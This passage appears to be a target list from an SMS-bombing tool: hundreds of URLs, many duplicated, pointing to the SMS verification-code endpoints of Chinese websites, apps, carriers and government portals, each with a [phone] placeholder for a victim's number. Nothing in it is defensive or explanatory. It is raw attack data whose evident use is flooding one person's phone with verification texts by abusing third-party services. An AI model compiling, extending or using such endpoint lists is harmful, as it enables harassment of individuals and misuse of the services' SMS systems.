"http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", - "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", - "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", - "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=您的短信验证码是:%verifycode%。您的手机号正在�%", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://reg.uuyoyo.com/AshxHandler/AjaxRegHandler.ashx?action=reg_phone_code_send&_=&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", - "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://i.360.cn/smsApi/sendsmscode?condition=2&r=&callback=&account=[phone]", - "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", - "http://www.cgv.com.cn/mem/getRegCapCha.fo?MOBILE_NO=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", - "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", - "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", - "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://dxhz.xqapi.live/api.php?id=[phone]", - "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%253D", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", - "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584495050906", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", - "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", - "https://cfapi.yaomengwang.cn/local/v1/account/regist/sms?mobile=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", - "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", - "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", - "https://www.771ka.com/register/checkinfo?clientid=newmobile&newmobile=[phone]&_=1589617672457", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", - "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", - "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", - "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", - "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", - "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=%E9%BD%90%E6%99%A8&fromurls=http%3A%2F%2Fwww.mianfeidianhua.net%2Fhsnzy.html&content=%E6%83%B3%E5%92%A8%E8%AF%A2%E3%80%82&did=382&uid=2010131726&phone=[phone]&_=1551173567919", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", - "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", - "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", - "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", - "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", - "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", - "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", - "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", - "https://beacons.gcp.gvt2.com/domainreliability/upload", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", - "http://api9000.chengqinhr.xyz/app/getQmjzSms/[phone]?appid=com.qgjz.ptjz", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", - "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", - "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE@5.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", - "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", - "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", - "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - 